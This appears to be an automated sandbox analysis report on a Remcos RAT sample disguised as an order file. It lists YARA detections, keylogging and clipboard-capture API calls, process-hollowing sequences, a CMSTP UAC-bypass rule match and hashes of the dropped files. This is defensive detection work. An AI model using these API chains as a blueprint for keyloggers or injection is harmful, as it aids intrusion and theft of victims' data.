                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49745 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,000000004_2_0040A2B8
                  Installs a global keyboard hook
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifWindows user hook set: 0 keyboard low level C:\Users\Public\Libraries\lhgtogaW.pifJump to behavior
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B70E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_2_004168C1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,4_1_004168C1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,5_2_0040987A
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,5_2_004098E2
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,4_2_0040B70E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,4_2_0040A3E0
                  Source: Yara matchFile source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041C9E2 SystemParametersInfoW,4_2_0041C9E2
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0041C9E2 SystemParametersInfoW,4_1_0041C9E2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.lhgtogaW.pif.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 14.1.lhgtogaW.pif.400000.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.2.lhgtogaW.pif.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 4.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.1.lhgtogaW.pif.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: SHEOrder-10524.exe PID: 7276, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: lhgtogaW.pif PID: 7432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: lhgtogaW.pif PID: 7868, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: lhgtogaW.pif PID: 8068, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: C:\Users\Public\Libraries\WagotghlO.bat, type: DROPPEDMatched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: SHEOrder-10524.exe
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028DC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028DC3F8
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028DC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_028DC368
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028DC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_028DC4DC
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028D7AC0
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_028D7968
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D7F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_028D7F48
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028DC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_028DC3F6
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory,0_2_028D7966
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028D7F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread,0_2_028D7F46
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,4_2_004180EF
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,4_2_004132D2
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,4_2_0041BB09
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,4_2_0041BB35
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,TerminateProcess,GetLastError,4_1_004180EF
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,4_1_004132D2
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,4_1_0041BB09
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,4_1_0041BB35
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,5_2_0040DD85
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00401806 NtdllDefWindowProc_W,5_2_00401806
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_004018C0 NtdllDefWindowProc_W,5_2_004018C0
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028DCA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle,0_2_028DCA6C
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,4_2_004167B4
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,4_1_004167B4
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: 0_2_028C20C40_2_028C20C4
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0043E0CC4_2_0043E0CC
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041F0FA4_2_0041F0FA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004541594_2_00454159
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004381684_2_00438168
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004461F04_2_004461F0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0043E2FB4_2_0043E2FB
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0045332B4_2_0045332B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0042739D4_2_0042739D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004374E64_2_004374E6
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0043E5584_2_0043E558
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004387704_2_00438770
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004378FE4_2_004378FE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_004339464_2_00433946
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0044D9C94_2_0044D9C9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00427A464_2_00427A46
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0041DB624_2_0041DB62
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00427BAF4_2_00427BAF
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00437D334_2_00437D33
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00435E5E4_2_00435E5E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00426E0E4_2_00426E0E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_0043DE9D4_2_0043DE9D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00413FCA4_2_00413FCA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_00436FEA4_2_00436FEA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_274CB5C14_2_274CB5C1
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_2_274D71944_2_274D7194
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0043E0CC4_1_0043E0CC
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0041F0FA4_1_0041F0FA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004541594_1_00454159
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004381684_1_00438168
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004461F04_1_004461F0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0043E2FB4_1_0043E2FB
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0045332B4_1_0045332B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0042739D4_1_0042739D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004374E64_1_004374E6
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0043E5584_1_0043E558
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004387704_1_00438770
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004378FE4_1_004378FE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_004339464_1_00433946
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0044D9C94_1_0044D9C9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00427A464_1_00427A46
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0041DB624_1_0041DB62
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00427BAF4_1_00427BAF
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00437D334_1_00437D33
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00435E5E4_1_00435E5E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00426E0E4_1_00426E0E
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_0043DE9D4_1_0043DE9D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00413FCA4_1_00413FCA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 4_1_00436FEA4_1_00436FEA
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0044B0405_2_0044B040
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0043610D5_2_0043610D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_004473105_2_00447310
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0044A4905_2_0044A490
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0040755A5_2_0040755A
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0043C5605_2_0043C560
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0044B6105_2_0044B610
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0044D6C05_2_0044D6C0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_004476F05_2_004476F0
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0044B8705_2_0044B870
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0044081D5_2_0044081D
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_004149575_2_00414957
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_004079EE5_2_004079EE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00407AEB5_2_00407AEB
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0044AA805_2_0044AA80
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00412AA95_2_00412AA9
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00404B745_2_00404B74
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00404B035_2_00404B03
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_0044BBD85_2_0044BBD8
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00404BE55_2_00404BE5
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00404C765_2_00404C76
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00415CFE5_2_00415CFE
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00416D725_2_00416D72
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00446D305_2_00446D30
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00446D8B5_2_00446D8B
                  Source: C:\Users\Public\Libraries\lhgtogaW.pifCode function: 5_2_00406E8F5_2_00406E8F
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                  Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\lhgtogaW.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                  Source: C:\Users\user\Desktop\SHEOrder-10524.exeCode function: String function: 028C44A0 appears 67 times
